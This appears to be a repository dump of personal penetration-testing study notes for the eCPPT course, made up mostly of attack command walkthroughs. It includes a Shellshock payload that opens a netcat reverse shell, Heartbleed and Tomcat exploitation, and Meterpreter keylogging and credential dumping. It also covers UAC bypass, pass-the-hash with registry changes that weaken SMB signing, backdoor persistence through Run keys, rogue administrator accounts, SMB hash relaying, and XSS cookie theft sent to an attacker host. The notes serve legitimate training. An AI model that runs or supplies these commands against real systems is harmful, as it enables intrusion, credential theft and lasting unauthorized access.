http://192.168.1.2/cgi-bin/login.cgi && cat login.cgi 109 | If this worked we should see the target systems etc/passwd file 110 | Now setup netcat and create a reverse shell 111 | nc -lvnp 1234 112 | wget -U "() {foo;};echo; /bin/nc 192.168.1.49 1234 -e /bin/sh" http://192.168.1.2/cgi-bin/login.cgi 113 | 114 | EXPLOITING HEARTBLEED: 115 | 116 | OpenSSL versions 1.0.1 through 1.0 117 | nmap --script ssl-heartbleed 192.168.1.2 118 | msf> use auxiliary/scanner/ssl/openssl_heartbleed 119 | set rhosts 120 | show actions 121 | set action DUMP 122 | run 123 | now look where the information was dumped and you may be able to find username and passwords 124 | IF YOU DO NOT GET INFORMATION THE FIRST TIME, TRY AGAIN THIS IS LEAKING DATA FROM MEMORY SO IT WILL BE DIFFERENT 125 | 126 | EXPLOITING JAVA RMI REGISTRY: 127 | 128 | nmap -sT 192.168.1.2 -p 1099 -sV or msf > use exploit/multi/misc/java_rmi_server 129 | set rhosts 130 | set ssl true (you may need to make your own cert to get around IDS) 131 | run -j 132 | 133 | EXPLOITING APACHE TOMCAT: 134 | 135 | msf > use auxiliary/scanner/http/tomcat_mgr_login 136 | set Stop_ON_SUCCESS true 137 | set rport (most likely 8180) 138 | set rhosts 192.168.1.2 139 | run 140 | 141 | upload a war file when you get access 142 | one spot (if still there) is /usr/share/laudanum which has a cmd.war file in it 143 | Now browse to URL 144 | 192.168.1.2:8180/cmd/cmd.jsp 145 | we can now execute commands on the system 146 | I have also used reverse shells and started a listener to connect back to me 147 | 148 | 149 | -------------------------------------------------------------------------------- /Low hanging fruit.txt: -------------------------------------------------------------------------------- 1 | Low Hanging Fruit 2 | Misconfigured Servers 3 | Unimplemented or badly implemented ACLs 4 | Default or weak passwords 5 | Open SMB Shares / Null Sessions 6 | Broadcast Requests 7 | Vulnerabilities related to public exploits 8 | 9 | NCrack 10 | Brute forcing tool that can use its own wordlist or hav a wordlist specified 11 | Can be used with NMAP so the ports it will look for information are already shown on the NMAP scan 12 | Within NMAP export the results utilizing the -oN command 13 | From there then feed that into ncrack with the -iN command and give a username and password wordlist 14 | NCrack will automatically look at the NMAP scan and try to find the ports that it can crack, and then attack those ports on the target machines (you can have more than one IP address in the report) 15 | 16 | EyeWitness 17 | Used to help identify low hanging fruit as it applies to web applications and networking devices 18 | Can figure out if default credentials are being used on HTTP and HTTPS enabled ports 19 | Can be downloaded on github 20 | ./setup.sh 21 | to use: 22 | python EyeWitness.py --headless --prepend-https -f urls.txt (this can either be urls or IP addresses) 23 | When scan completes it will generate a HTLM report with its findings 24 | Also contains --active-scan with will actively try to log in (be careful of account lockouts) 25 | 26 | Rsmangler 27 | Used to generate a wordlist out of a few words (utilizes variations and permutations) 28 | make a wordlist (just a couple of words, maybe 2 to three words) 29 | cat wordlist.txt | rsmangler --file - > wordlist_new.txt 30 | You will see that very quickly the wordlist will increase and give you everything that could possibly be from those few words 31 | 32 | CeWL 33 | Scrapes a targets website and creates a wordlist 34 | cewl -m 8 http://example.com 35 | The above example will pull all words with a minimum value of 8 characters (wordlist will be 8 or more characters) 36 | -------------------------------------------------------------------------------- /MITMf Python.txt: -------------------------------------------------------------------------------- 1 | MITM HSTS Bypass (have not tested yet) 2 | 3 | use mitmf.py 4 | 5 | python mitmf.py -i --spoof --arp --dns --hsts --gateway --targets 6 | ex: 7 | python mitmf.py -i eth0 --spoof --arp --dns --hsts --gateway 192.168.1.1 --targets 192.168.1.2 8 | 9 | -------------------------------------------------------------------------------- /More NMAP Tricks eCPPT.txt: -------------------------------------------------------------------------------- 1 | NMAP Zombie Scanning 2 | 3 | Utilize a zombie to scan systems that are not allowed to be scanned by other systems 4 | We can use this to bypass firewalls / ACLs, or not release our IP address when scanning a system 5 | 6 | First we need to find a zombie machine 7 | To do this we need to use the -O option 8 | ex: 9 | nmap -O -v -n 10.10.10.10 10 | The -O will look at the operating system and we want to see if IP ID sequence Generation is Incremental 11 | If so we can use that machine as our zombie machine 12 | Now find an open port on that zombie machine 13 | Regular nmap scan on zombie machine 14 | From there we can scan other systems through out zombie machine 15 | ex: 16 | nmap -Pn -sI -v 17 | In the above example we do not want to send pings from our machine (our original machine no the zombie) 18 | We are then using a zombie IP and port, which is told with -sI 19 | we can also do any other scans we want 20 | ex 21 | nmap -Pn -sI 10.10.10.10:135 10.10.10.9 -p- -vv -sC -sV 22 | We can also use just the -p option to look at a single, or a few ports 23 | 24 | 25 | NMAP Bounce Scan 26 | 27 | Allows us to use FTP Bounce Attack, which utilizes the FTP server to access other machines on the internet and can conduct scans 28 | on networks that we may not have access to (internal networks) 29 | To do this we have to use the -b option in nmap 30 | Any scan utilizing the -b option will look like it originated from the FTP server, thus hiding us 31 | 32 | NMAP Firewall Rules 33 | 34 | To test the rules of firewalls we can use the -sA option within NMAP 35 | You can inspect the packets even further if you also run wireshark 36 | 37 | -------------------------------------------------------------------------------- /Network Security.ctb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/overgrowncarrot1/eCPPT-Notes/9ffd59cb5a94c7b70544cba67c81e8683a370d58/Network Security.ctb -------------------------------------------------------------------------------- /Pillaging.txt: -------------------------------------------------------------------------------- 1 | PILLAGING 2 | 3 | When enumerating you are looking for the following things: 4 | 5 | Important Files 6 | Credentials 7 | Accounts 8 | IM Logs 9 | Network blocks 10 | Domains 11 | Intranet Servers 12 | Shared Hard Drives 13 | Printers 14 | Repositories 15 | 16 | Scipts and Commands for Data Harvesting: 17 | 18 | Meterpreter: 19 | sysinfo 20 | getuid 21 | ps 22 | run post/windows/gather/ (there are 106 different possibilities we can run here) 23 | some to look at: 24 | enum shares 25 | enum domain group users 26 | enum services (this can be used instead of looking for services in windows) 27 | enum domains 28 | enum chrome (will try and get credentials stored in chrome) 29 | enum applications 30 | service --status-all 31 | run winenum 32 | screenshot 33 | screenshare 34 | (all that good stuff you already know) 35 | keyscan_start (to explorer.exe or winlogon.exe) 36 | winlogon.exe will show you what the user is typing as they login... 37 | run keylogrecorder -c x (in place of the x either do 0 which is for explorer.exe, 1 which is for winlogon or 2 38 | which is no migration the keystrokes will also be saved) 39 | search -d C:\\Users\\els\\ -f *.kbdx (this will search for KeePass extensions) 40 | 41 | 42 | Shell: 43 | wmic service get caption,startname,state,pathname 44 | net start 45 | net view /domain 46 | net group "Domain Controllers" /domain 47 | net user 48 | net user /domain 49 | net localgroup 50 | localgroup Administrators 51 | net share 52 | arp -a 53 | ipconfig 54 | 55 | 56 | Linux Shell: 57 | cat etc/passwd 58 | -------------------------------------------------------------------------------- /PowerShell Cont..txt: -------------------------------------------------------------------------------- 1 | Powershell Cont. 2 | 3 | Modules: 4 | A set of PowerShell functionalities group together in the form of a single file that will typically have a .psm1 extension 5 | Compromised of serveral components 6 | PS C:\> Get-Module 7 | This will show the currently imported modules for the current PowerShell session 8 | PS C:\> Get-Module -ListAvailable 9 | Returns a list of modules that are available for use 10 | PS C:\> Import-Module .\module.psm1 11 | This will import a module that you select 12 | To use PowerSploit 13 | Git hub link: 14 | https://github.com/PowerShellMafia/PowerSploit/archive/master.zip 15 | Now copy the PowerSploit module into a module path 16 | To see current paths 17 | $ENV:PSModulePath 18 | C:\users\user\Documents\WindowsPowerShell\Modules 19 | Create a PowerSploit folder 20 | Before getting PowerSploit or executing make sure to allow through AV 21 | Extract PowerSploit with 7zip 22 | Now import the PowerSploit module 23 | Import-module PowerSploit 24 | Get-module 25 | Get-Command -Module PowerSploit 26 | We can see a lot of different things that PowerSploit can do 27 | Get-Help Write-HihackDLL 28 | This will show a help screen for that module 29 | -------------------------------------------------------------------------------- /Powershell.txt: -------------------------------------------------------------------------------- 1 | Powershell for Pentesters: 2 | 3 | Powershell version 5.0 is harder to manipulate 4 | Slides say we will be working mostly with 1.0 and 2.0 5 | 6 | Powershell CLI: 7 | 8 | Provides acess to built in: 9 | cmdlets 10 | modules 11 | functions 12 | features 13 | provides a way to create tasks, functions, variables interactively 14 | 15 | 16 | Shorcut for powershell (if cmd line is not opening powershell) 17 | "%appdata%\Microsoft\Windows\Start Menu\Programs\Windows Powershell" directory 18 | 19 | 20 | Powershell executable if teh shortcuts are unavailable: 21 | "C:\Windows\System32\WindowsPowwerShell\v1.0" or whatever version you are using 22 | 23 | If you're operating on a 64-bit system the location can be found at the following 24 | "C:\windows\system32\WindowsPowerShell 25 | 26 | If using a 32bit system you can locate powershell at: 27 | "C:\Windows\SysWOW64\WindowsPowerShell" directory 28 | 29 | To see if you are running a 32 or 64 bit system you can use the following in cmd line 30 | [Environment]::Is64BitProcess 31 | If retured true it is 64, if false it is 32 32 | 33 | 32 and 64 bit PowerShell executables can be found at 34 | "C:\Windows\System32\WindowsPowerShell\*" 35 | 36 | When possible try and launch powershell as an administrator 37 | 38 | /? for help (or -Help) 39 | 40 | Basic Usage (from command line opening powershell. All commands will start with powershell.exe) 41 | 42 | Some of the following are scripts that we can see if we can run or be disbled with "Bypass" or "Unrestricted" arguments 43 | powershell.exe -ExecutionPolicy Bypass .\script.ps1 44 | powershell.exe -ExecutionPolicy Unrestricted .\script.ps1 45 | To hide powershell window 46 | powershell.exe -WindowsStyle Hidden .\script.ps1 47 | To specify a command or script block to run 48 | -Command Get-Process 49 | -Command "& { Get-EventLog -LogName security }" 50 | To execute base64 encoded scripts or commands 51 | -EncodedCommand $encodedCommand 52 | To not load any powershell profiles (this can helps us because no profiles are loaded that may have different security features on them) 53 | -NoProfile .\script.ps1 54 | Version 55 | -Version 2 (this will downgrade the version of Powershell to version 2, this does require that older versions are installed on the system you are attacking) 56 | 57 | Get-Help: 58 | We can use the Get-Help cmdlet to obtain a manual page on different parts of powershell 59 | example: 60 | Get-Help Get-Process -Full 61 | To see examples of how to use a specific commandlet we can use the -Examples 62 | example: 63 | Get-Help Get-Process -Examples 64 | Get-Help Get-Process -Online (this will show you an online page for that process) 65 | Update-Help (will update the local help manual) 66 | 67 | CMDLETS: 68 | These are light-weight PowerShell scripts that perform a single function 69 | Native commands in PowerShell (we can also create our own) 70 | example: 71 | Get-Process | Sort-Object -Unique | Select-Object ProcessName 72 | Get-Process | Sort-Object -Unique | Select-Object ProcessName > uniq_process.txt (to output what you got to a file) 73 | Using Get-Process by itself will give you some of the processes that are running 74 | To get a better understanding of what is running 75 | Get-Process | Format-List * 76 | We can then further extend this information to get information about specific processes and paths to their executables 77 | Get Process chrome, firefox | Sort-Object -Unique | Format-List Path 78 | We can also get process paths and PIDs 79 | Get Process chrome, firefox | Sort-Object -Unique | Format-List Path, Id 80 | There are also aliases for different commands, such as Get-Child can be looked at by typing ls 81 | To see what aliases we can use 82 | Get-Alias -Definition Get-ChildItem 83 | This will bring back three different commands we can use, ls, dir and gci 84 | Another alias we will see often is select (which is the alias for select-object) 85 | Get-WmiObject -class win32_operatingsystem | select -Property * 86 | For format-list we can use fl 87 | Get-WmiObject -class win32_service | Sort-Object -Unique PathName | fl Pathname 88 | We can also save the information we are gathering with Export 89 | Get-WmiObject -class win32_service | fl* | Export-Csv C:\host_info.csv 90 | To access Windows Registry hives 91 | cd HKLM:\ 92 | Select String can be use to help us find different types of documents 93 | Select-String C:\users\user\Documents\*.txt -Pattern pass* 94 | We can then use Get-Contet to display the information within a file (like cat) 95 | Get-Content C:\Users\user\Documents\passwords.txt 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | -------------------------------------------------------------------------------- /PrivEsc and Maintain Access.txt: -------------------------------------------------------------------------------- 1 | Post Exploitation: 2 | Privilege Escalation and Maintaining Access 3 | 4 | To automatically migrate to a different process utilize the getpid command in meterpreter 5 | Meterpreter script will not try and increase privileges however, privs will stay the same just the process will be changed 6 | this could be useful if you are using a web exploit and you want to make sure if the user closes out of the webpage the exploit still works 7 | 8 | The easiest way to increase privs is to utilize getsystem in meterpreter which will try and automatically increase privs 9 | By default getsystem tries all the different techniques in meterpreter, however if you want to run a ceratin technique use -t x (where x = number to run) 10 | Depending on current privileges on the machine you may not be able to use getsystem 11 | IF UAC IS ENABLED ON A REMOTE SYSTEM, GETSYSTEM WILL NOT WORK 12 | TO BYPASS USE A bypassuac module 13 | post/windows/gather/win_privs 14 | If UAC Enabled is set to true then the remote system has UAC enabled 15 | search bypassuac 16 | a few options should come up 17 | bypassuac_vbs module is the newest module at the time of writing 18 | we have to set the session ID to tell it which module to run on 19 | run the module 20 | If we can bypass everything then we will get another meterpreter shell that will then have the highest privileges on that target machine 21 | Remember UAC still exists, we just bypassed it for the time being 22 | 23 | After you have increased your privileges you can utilize incognito 24 | This has been migrated to metasploit 25 | use incongnito 26 | after using inconginito we can view and impersonate tokens 27 | list_tokens 28 | impersonate_tokes 29 | 30 | Unquoted Service Paths 31 | This is another method we can use for persistence or for escalating our privileges 32 | The issue arises when a Windows service has been configured with a patch to a service binary which is unquoted and contains spaces in its path 33 | Pretty much if there are spaces, you can mess it up! 34 | Example: 35 | C:\Program Files(x86)\Canon\My Scan Utility\ryan.exe 36 | The above example gives us 2 options in regard to an executable we can drop and in which directory 37 | C:\Program.exe 38 | C:\Program Files(x86)\Canon\My.exe 39 | We can make a program.exe or a my.exe and it will launch instead of running ryan.exe 40 | 41 | How to check for Unquoted Service Paths 42 | WMI Command Line Tool (WMIC) to query for all services and paths, specifically searching for unquoted 43 | paths with the following command line: 44 | C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 45 | We can also use the "sc" Service Control command with the "qc" (show config) option to query a specific service and manually check for an unquoted path 46 | How to check automatically with Metasploit 47 | use exploit/windows/local/trusted_service_path 48 | We need to know both ways because Metasploit may not always work to find and exploit unquoted service path vulnerabilities 49 | 50 | LINUX PRIV ESC 51 | The above is all Windows attacks, now we are going to focus on Linux 52 | 53 | Best way to gain Priv Esc is to look up the current OS and then searching for publicly available exploits 54 | eCPPT focuses a lot on actual OS exploits, looking up the OS on the web and finding exploits on the web for those versions numbers 55 | 56 | For the OS attacks, when finding the exploits we may need to compile them ourselves. 57 | The above scenario also believes that you already have a session with the target machine 58 | Utilizing Metasploit we are able to upload the exploit that was found after it is compiled 59 | upload . 60 | MAKE SURE TO PUT THE . AT THE END 61 | go back into shell 62 | make sure you are root 63 | IF THE TARGET MACHINE DOES NOT HAVE GCC WE CANNOT COMPILE THE EXPLOIT THERE AND WE HAVE TO DO IT LOCALLY 64 | IF OUR Operating System is 64-bit and the target machine is 32-bit we need to set the GCC parameters 65 | In order to compile an exploit such as this you would have to do it within kali cli 66 | gcc -m32 -o linux_priv_esc 37292.c (or whatever the exploit is) 67 | You should now have a file called linux_priv_esc 68 | Make sure that it is executable 69 | Now we can upload that exploit to our target machine utilizing meterpreter 70 | again make sure the file permissions are executable 71 | From there go back into shell 72 | whoami and you should be root 73 | 74 | OTHER WAYS TO GET HIGHER PRIVS ON A MACHINE 75 | Explore permissions on processes running on the machine 76 | sudo -l 77 | suid find (which is on the desktop for me) 78 | ps (in windows to see if printer services can be migrated to under NT SYSTEM/AUTHORITY 79 | We can also escalate privileges by replacing files like DLLs or executables 80 | This may happen if you have the rights to write or edit files used by a service or process 81 | One of the examples that eCPPT gives is the following 82 | An executable is running with system privileges and its executable is stored in a folder on which we have write permissions 83 | We can change the file utilizing msfvenom, or inject the file with something like Shellter, BDF and so on 84 | We can then try and restart the service (the classes states through DoS attack, however there may be other ways) 85 | 86 | MAINTAINING ACCESS: 87 | 88 | Once you get into the system and become root, or sys we need to keep those privileges through persistence 89 | Some ways to maintain access 90 | RDP or VNC 91 | If there are not any services we need to activate services 92 | If you have to make a new user you have to add them to the proper groups 93 | 94 | PASSWORD HASH RECOVERY 95 | Once in a system we can do a load kiwi 96 | from there we can do a hashdump and try to crack those hashes 97 | We now have a username that we are able to continue to use to get into the system 98 | We may also be able to "run hashdump" depending on the version of meterpreter you have (which will do a little further digging) 99 | If we get permission denied, we may need to migrate to another service 100 | If we get pri_passwd_get_sam_hashes.... run hashdump and try to migrate to another service 101 | 102 | CRACK HASHES/PASS THE HASH 103 | If we are unable to crack hashes we may need to try and do pass the hash 104 | psexec can utilize either passwords or pass the hash 105 | use exploit/windows/smb/psexec 106 | There can be problems with pass the hash 107 | If an account is not an actual administrator (RID-500) but is within the administrators group pass the hash will most likely not work 108 | We will most likely get a STATUS_ACCESS_DENIED (Command=117 WordCount=0) 109 | The above deny status tells us that most likely the registry needs to be changed 110 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 111 | Add a new DWORD (32-bit) named 112 | LocalAccountTokenFilterPolicy and set its value to 113 | Set-ItemProperty -Path 114 | HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System - Name LocalAccountTokenFilterPolicy -Value 1 -Type Dword 115 | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters 116 | add a new DWORD (32-bit) named RequireSecuritySignature and set its value to 0 117 | Set-ItemProperty -Path 118 | HKLM:\\System\CurrentControlSet\Services\LanManServer\Parameters -Name RequireSecuritySignature -Value 0 -Type Dword 119 | 120 | WE CAN ALSO USE THE REG COMMAND TO ACCOMPLISH THE SAME THING 121 | 122 | C:\> reg add 123 | "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f 124 | 125 | C:\ reg add 126 | "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters" /v RequireSecuritySignature /t REG_DWORD /d 0 /f 127 | 128 | THE REG CHANGES MAY ALLOW FOR NON RID-500 USER ACCOUNTS TO SUCCESSFULLY PASS-THE-HASH IN SOME CASES 129 | 130 | TO USE PASS-THE-HASH WITH RDP WE CAN USE "xfreerdp" 131 | To do this do the following 132 | xfreerdp /u:(username) /d:(domain name such as foocorp) /pth:(hash) /v:(IP address) 133 | xfreerdp /u:admin /d:foocorp /pth: /v:192.168.1.2 134 | 135 | TO USE MIMIKATZ WE MUST BE ON A 64-BIT PROCESS 136 | This means that when we do a sysinfo if we are on a 32-bit system we need to migrate to a 64-bit process 137 | Remember to see processes use the ps command 138 | to migrate use migrate number 139 | After we load mimikatz (or kiwi) we may be able to use the wdigest to see plain text passwords 140 | 141 | USING WINDOWS CREDENTIALS EDITOR 142 | THIS IS A WINDOWS BINARY, SO WE WILL HAVE TO UPLOAD IT ON THE REMOTE MACHINE WITH METERPRETER 143 | execute -i -f wce.exe -a -h 144 | THEY DID NOT DIG ANY DEEPER INTO THIS WITH THE LESSONS, HOWEVER MAY BE USEFUL INFORMATION 145 | 146 | ENABLE RDP SERVICE 147 | To see what is already running on a machine use the following command 148 | shell 149 | net start 150 | we may see that Remote Desktop Configuration, services and other things are on 151 | ANOTHER WAY TO SEE WHAT IS RUNNING ON A WINDOWS MACHINE 152 | wmic service where 'Caption like "Remote%" and started=true' get Caption 153 | USING METERPRTER SCRIPTS TO CHECK SERVICES 154 | run service_manager -l 155 | run post/windows/gather/enum_services 156 | IF RDP IS DISABLED DO THE FOLLOWING IN METERPRETER 157 | run getgui -h 158 | run getgui -e 159 | if username and password is known 160 | -p and -u command can also be used 161 | When we do the above commands RDP is enabled and we can have it automatically start when the user logs in 162 | GRANTING RDP PERMISSIONS IF USER IS NOT ALLOWED TO UTILIZE RDP 163 | From windows shell run the following 164 | net localgroup "" /add 165 | net localgroup "Remote Desktop Users" els_user /add 166 | From here we can now try and establish an RDP session with the target machine 167 | to see what groups are allowed do the following 168 | net localgroup 169 | net localgroup "Remote Desktop Users" 170 | net localgroup "Administrators" /add 171 | net localgroup "Administrators" stduser /add 172 | this would add stduser to an administrator group thus increasing their privleges on a network 173 | We could do this for many different groups, such as putting users in TelnetClients group and more 174 | 175 | BACKDOOR 176 | 177 | THE SCRIPT THAT IS SHOWN IN THE COURSEWARE ONLY WORKS ON WINDOWS MACHINES 178 | 179 | In meterpreter run the following 180 | run persistence -h 181 | run persistence -A -X -i 5 -p 8080 -r 182 | The above script does the following 183 | -A starts handler on kali machine 184 | -X start the agent at boot 185 | -X requires systems privs on the machine 186 | -i 5 attempt to connect every 5 seconds 187 | -p port you want to connect back to 188 | -r kali linux ip address 189 | After this script has been run we can see that everything went through, and see where the file went with meterpreter 190 | reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v 191 | the file name was shown when you ran the script above, will be a bunch of random letters 192 | From here in Data we can see where the file is located 193 | Now we need to run a multi handler exploit 194 | use exploit/multi/handler 195 | make sure you use the same options as you did with the backdoor 196 | If we were to craft our own backdoor on MSFVenom you can upload the file through meterpreter 197 | upload 198 | upload /root/my_bd.exe C:\\windows\ 199 | Now edit the windows registry key to load file at startup (this can again be done in meterpreter) 200 | reg setval -k -d -v 201 | regsetval -k 202 | HKLM\\software\\microsoft\\windows\\currentversion\\run -d "C:\Windows\my_bd.exe" -v bd_name 203 | 204 | NOW CREATE A NEW USER 205 | In windows shell do the following 206 | net user /add 207 | net user newuser newpass /add 208 | net localgroup "Administrators" /add 209 | net localgroup "Administrators" newuser /add 210 | This will creat a new user and allow us to put that user on an Administrator group thus creating persistence 211 | 212 | DLL HIJACKING / PRELOADING 213 | This is done in the labs by writing to a DLL that a user can write to, however, escalates us to system privs 214 | -------------------------------------------------------------------------------- /Responder and MultiRelay MITM SMB hash attacks.txt: -------------------------------------------------------------------------------- 1 | MITM LLMNR and NBT-NS 2 | 3 | Responder/MultiRelay are used for hash relays 4 | Responder is able to spoof messages if someone accidently puts in the wrong smb information 5 | Responder will act as if it is the SMB share the user is looking for and obtain the username and password 6 | 7 | For this attack to work SMB signing must be disabled 8 | We can see this through an NMAP scan or by using RunFinger.py 9 | python RunFinger.py -i 10 | 11 | To launch responder/multirelay attack 12 | 13 | Modify the responder.conf configuration file 14 | set SMB server and HTTP server to off 15 | 16 | launch the responder.py with -I (interface) 17 | We can also downgrade the NTML hashes if supported with --lm 18 | python Responder.py -I eth0 --lm 19 | Open a new terminal window 20 | python MultiRelay.py -t -u ALL 21 | -------------------------------------------------------------------------------- /SMB Enumeration.txt: -------------------------------------------------------------------------------- 1 | NetBIOS Study Guide 2 | 3 | nbtstat -n (within windows) 4 | nbtstat -a (within windows) 5 | net view (within windows) 6 | net use \\\c (in windows) 7 | This will allow us to connect to the remote share drive K and then connect to the C resource 8 | 9 | 10 | nbtscan -v (in kali) 11 | v is used for verbose 12 | can also scan an entire network (such as a /24) 13 | 14 | 15 | 16 | NULL SESSIONS 17 | 18 | These are some of the oldest attacks against SMB 19 | They are used against Windows NT and Windows 2000 20 | Null Sessions return information without any authentication process 21 | 22 | To see if system is vulnerable to null session on Windows 23 | net use \\\IPC$ "" /u:"" 24 | If the command is completed successfully it is vulnerable 25 | 26 | In the above command we have a empty (anonymous) username and no password 27 | 28 | TOOLS USED BY WINDOWS 29 | winfingerprit 30 | winfo -n 31 | DumpSec (formerly known as DumbAcl) 32 | 33 | TOOLS USED BY LINUX 34 | enum4linux 35 | rpcclient (must first have a connection established on a remote machine) 36 | rpcclient -N -U "" 37 | -N states doe not ask for password 38 | -U is username, in this case null (nothing/empty) 39 | To get users using rpcclient 40 | enumdomusers 41 | RPCCLIENT Useful Commands 42 | enumalsgroups 43 | srvinfo 44 | lookupnames 45 | queryuser 46 | enumprivs 47 | -------------------------------------------------------------------------------- /SNMP Enumeration.txt: -------------------------------------------------------------------------------- 1 | SNMP ENUMERATION 2 | 3 | Four types of SNMP commands used 4 | Read 5 | Write 6 | Trap 7 | Traversal Operations 8 | Works on UDP ports 161 and 162 9 | 10 | SNMP attacks 11 | Flooding 12 | Community 13 | Brute Force 14 | 15 | Easiest way to obtain community string is to sniff SNMPv1 and SNMPv2 traffic 16 | Both utilize clear text communications 17 | 18 | After getting in to a system there are many tools that can be used 19 | snmpwalk (part of net-snmp suite) 20 | 21 | ex: 22 | snmpwalk -v 2c -c public 23 | 24 | -v verbose 25 | 2c is the version that is being used by SNMP 26 | -c sets the community string to public 27 | 28 | If you get some weird iso.x.x.x.x.x hardware: 29 | do the following 30 | install snmp-mibs-downloader 31 | comment (#) the fourth line in /etc/snmp/snmp.conf 32 | 33 | snmpset (a tool used to request to either set or change information on a network entitiy) 34 | 35 | NMAP SNMP TOOLS 36 | NMAP comes with a few built in scripts for SNMP 37 | snmp-brute 38 | snmp-info 39 | snmp-interfaces 40 | snmp-netstat 41 | snmp-processes 42 | snmp-sysdescr 43 | snmp-win32-services 44 | /usr/share/nmap/scrip$ ls -l | grep -i snmp 45 | 46 | nmap -sU -p 161 --script= 47 | 48 | nmap --script-args snmp-brute.communitiesdb= 49 | a wordlist you can use: 50 | /usr/share/seclists/Misc/wordlist-common-snmp-community-strings.txt 51 | -------------------------------------------------------------------------------- /SSH Tunneling.txt: -------------------------------------------------------------------------------- 1 | Secure shell tunneling 2 | 3 | Can be used outside a network or inside a network 4 | SSH Tunneling will encrypt traffic as it sends it through 5 | Outside of our network: 6 | ssh -L :: username@sshserver 7 | lets say we wanted to connect to telnet through ssh 8 | ssh -L 3000:215.15.1.1:23 root@test 9 | We opened port 3000, passed the traffic to the remote host (ip or domain name), told it what port 10 | and lastly gave it a username and sshserver to connect to 11 | Once telnet is up and running we would have a local port 3000 listening on our machine 12 | telnet 127.0.0.1:3000 13 | the traffic will be encrypted because it will go through an SSH tunnel 14 | 15 | Inside of our network we can also create tunnels to other machines that have services running on their local ports 16 | I have seen mysql running on 127.0.0.1:3306 many times, we can tunnel ourselves to there! 17 | For instance our machine IP 192.168.231.2 18 | SSH Server machine IP 192.168.231.3 19 | When the mysql server is set to only allow local connections (127.0.0.1) we may be able to do the following 20 | ssh -L 3000:localhost:3306 test@192.168.231.3 21 | Now we should have a listening connection on port 3000 22 | mysql -h 127.0.0.1 -P 3000 -u root (or whatever the username may be) 23 | -------------------------------------------------------------------------------- /XSS.txt: -------------------------------------------------------------------------------- 1 | INE XSS 2 | 3 | Vulnerable Web Applications 4 | unfiltered user input to build the output content 5 | lets attackers control the output HTML and JavaScript code (allowing for application attacks) 6 | User input can be the following 7 | Request headers 8 | cookies 9 | form inputs 10 | POST parameters 11 | GET parameters 12 | 13 | Why use XSS 14 | make browers load malicious content 15 | perform operations on attackers behalf, such as buying products or changing passwords 16 | steal session cookies for impersonation 17 | 18 | Testing for XSS 19 | In a user input field you can try different parameters, such as scripts 20 | One easy way to test is to us test 21 | if test comes out in italics, then xss can occur 22 | after such test make a script 23 | 24 | The url may show the following, and a popup window may appear if XSS is allowed 25 | www.example.com/search.php?find= 56 | this will display the cookie session 57 | Send to attackers website 58 | 62 | This will generate an image object and point the src to a script on the attackers server (attacker.site) 63 | The browers cannot tell if the img is real or not, and loads the img. Nothing actually shows up because there is no image 64 | a log.php file can be used to save the cookie on the attacker.site 65 | 72 | 73 | 74 | Hack.me is a website to practice XSS 75 | 76 | VIDEO IS AWESOME IS ON, WATCHING A FEW TIMES AND DO THE LABS 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /eCPPT Labs Network Security.ctb.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/overgrowncarrot1/eCPPT-Notes/9ffd59cb5a94c7b70544cba67c81e8683a370d58/eCPPT Labs Network Security.ctb.pdf -------------------------------------------------------------------------------- /eCPPT Labs.ctb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/overgrowncarrot1/eCPPT-Notes/9ffd59cb5a94c7b70544cba67c81e8683a370d58/eCPPT Labs.ctb -------------------------------------------------------------------------------- /ineBurpSuite.txt: -------------------------------------------------------------------------------- 1 | INE BurpSuite 2 | 3 | Is an intercepting proxy 4 | allows an attacker to analyze and modify any request, and any response, exchanged between an HTTP client 5 | and server 6 | 7 | Most use web application proxies 8 | Burp Suite 9 | ZAP 10 | 11 | Burp Suite allows for 12 | Interception of requests and responses between browser and web server 13 | build requests manually 14 | crawl a website by automatically visiting every page in a website 15 | fuzz web applications by sending them patterns of valid and invalid inputs to test behavior 16 | 17 | Configuring Burp Suite 18 | 19 | start burp suite proxy 20 | open burp suite 21 | make sure intercept is on 22 | To check what burpsuite is collecting 23 | on the proxy > history tab 24 | in the target > Site Map tab 25 | 26 | Burp Repeater 27 | lets you manually build raw http requests 28 | provides the following 29 | syntax highlighting 30 | raw and rendered responses 31 | integration with other Burp tools 32 | Can also be used to try different usernames and passwords (along with username and password parameters for hydra) 33 | Repeater is used to show how an application will behave with different parameters 34 | 35 | You can also set a target that will allow you to just attack that one target 36 | 37 | Turn on Server response intercept 38 | Proxy 39 | Options 40 | Intercept Server Reponses (make sure it is clicked to go through burp) 41 | 42 | Add items to scope to only intercept those URLs 43 | 44 | When intercept is off, burp will still get information from HTTP pages 45 | 46 | Within Target Sitemap black words are pages you have actually gone to 47 | The grey pages are ones that burp found on its own 48 | 49 | To have burp crawl a target you can use the spider tab 50 | Spider is free on older versions of Burp, however, newer versions it is not 51 | 52 | There a a couple of labs that you should do for Burp Suite, especially if you have never used it before. -------------------------------------------------------------------------------- /ineSQL.txt: -------------------------------------------------------------------------------- 1 | SQL INJECTION 2 | 3 | SQL Syntax 4 | > SELECT FROM WHERE ; 5 | 6 | > SELECT 22, 'string', 0x12, 'another string'; 7 | 8 | UNION COMMAND 9 | >